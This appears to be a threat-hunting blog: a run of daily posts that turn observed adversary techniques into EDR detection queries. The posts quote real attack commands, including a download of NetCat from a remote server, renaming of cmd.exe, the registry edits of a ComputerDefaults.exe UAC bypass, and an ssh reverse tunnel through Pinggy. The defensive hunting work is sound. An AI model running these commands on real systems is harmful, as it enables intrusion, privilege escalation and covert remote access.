Posts

192. I'm Not Sure If I Want to Masquerade It

Image
Hello everyone! As it's Friday, let's look at a funny case, at least in my opinion. And it's one more time about masquerading. The case itself is related to exploiting public facing applications and deploying coinminers. Nothing special. But there're a few interesting behaviors! The adversary downloads NetCat from a remote server: (New-Object Net.WebClient).DownloadFile('hXXp://212.78.4[.]241:8081/docs/nc.exe', 'C:\programdata\userinit.exe') As you can see, the threat actors masquaraded NetCat to look like a legitimate process, bu at the same time copied and renamed cmd.exe : cmd c/ copy C:\Windows\System32\cmd.exe C:\ProgramData\c.exe So, once again we are dealing with renamed command and scripting interpreters: event_type: "processcreatewin" AND proc_file_originalfilename: "cmd.exe" AND NOT proc_file_name: "cmd.exe" And also command and scripting interpreters in uncommon locations: event_type: "processcreatewin"...

191. Some Threat Actors Just Want to Be Detected

Image
Hello everyone! I'm sure, you saw cases where adversaries really wanted the defenders to catch them. Yes, in some cases they may call the payload malware.exe or... Let's look at the example I spotted today: You got it right. The filename is payload.exe. That's it. So, why not to hunt for such suspicious filenames? For example: event_type: "processcreatewin" AND proc_file_path: "payload" Another interesting example - PDB paths. In some cases , they may be REALLY suspicious, for example: Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb So, if your EDR solution supports collecting PDB paths, you can also use it for detection and hunting: event_type: "processcreatewin" AND proc_file_pdb_path: ("payload" OR "hack" OR "backdoor" OR "attack" OR "bypass" OR "dropper" OR "exploit" OR "keylog" OR "trojan" OR "spy") See you tomorrow!

190. Does Renaming Legitimate Binaries Really Mask Them?

Image
Hello everyone! Today I want to look at another stealer -  NordDragonScan . Once again, the adversary uses a malicious LNK file to download an HTA - a very common behavior. But it's not the thing that caught my attention, it's the following: "The malicious HTA file copies the legitimate PowerShell.exe binary to the path “C:\Users\Public\Documents\install.exe” to mask itself" So, here we have a renamed PowerShell.exe binary, and also quite suspicious staging folder - looks like the adversary made things even noisier! We already talked about renamed system binaries, and here's another example: event_type: "processcreatewin" AND proc_file_originalfilename: "powershell.exe" AND NOT proc_file_name: "powershell.exe" And also another suspicious staging folder: event_type: "processcreatewin" AND proc_file_path: "Public\\Documents" See you tomorrow!

189. Adversaries Abuse ComputerDefaults.exe to Bypass the UAC

Image
Hello everyone! There're quite a few well-known ways to bypass the User Account Control (UAC). Some are often used in-the-wild, some are not. Let's look at a recent example from Kaspersky report on Batavia spyware. The adversary abused  ComputerDefaults.exe to bypass UAC. To do it, the threat actor modified two registry keys using reg.exe : reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f /ve /t REG_SZ /d "%temp%\windowsmsg.exe <arg>" It means we can hunt for related registry keys modification events: event_type: "registryvaluesetwin" AND reg_key_path: "ms-settings\\shell\\open\\command" Also, check for suspicious processes spawned as a child process of  ComputerDefaults.exe : event_type: "processcreatewin" AND proc_p_file_path: "computerdefaults.exe" See you tomorrow!

188. Adversaries Abuse Console Window Host More and More Often

Image
Hello everyone! We already talked about Console Window Host ( conhost.exe ) abuse. Usually threat actors used it with the " --headless " flag to hide the windows from the user upon execution. Unit42 conducted a research on malicious LNK files, and guess what? Yes, Console Window Host is among most often used system targets: powershell.exe cmd.exe rundll32.exe conhost.exe wscript.exe forfiles.exe mshta.exe What does it mean? It definitely worth a hunting query: event_type: "processcreatewin" AND proc_file_name: "conhost.exe" AND cmdline: "headless" See you tomorrow!

187. Scattered Spider Started to Abuse Teleport

Image
Hello everyone! If you checked the report I shared yesterday, you should have noticed another interesting legitimate tool abused by Scattered Spider - Teleport. The adversary installed it to on compromised servers to establish a persistent remote command-and-control (C2) channel. We can start from hunting for downloading Teleport binaries, for example: event_type: "processcreatenix" AND proc_file_name: "curl" AND cmdline: "teleport.dev" Also, you may look for Teleport configuration file modification events: event_type: "filewrite" AND file_path: "teleport.yaml" See you tomorrow!

186. Pinggy: Another Tunneling Solution Abused by Adversaries

Image
Hello everyone! Have you read recent CrowdStrike's report on  SCATTERED SPIDER activity? If not, make sure you have! It contains lots of valuable information on adversary's tactics, techniques and procedures. One of them - abusing Pinggy - another privacy-focused tunneling solution. It's interesting that threat actors don't even have to drop its binary to the compromised system, they can use just ssh , for example: ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no -o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io So, the first thing to hunt for is "pinggy" in the command line: event_type: "processcreatewin" AND cmdline: "pinggy" Another opportunity is hunting for Pinggy-related domains: event_type: "dnsreq" AND dns_rname: ("pinggy.io" OR "pinggy.link") See you tomorrow!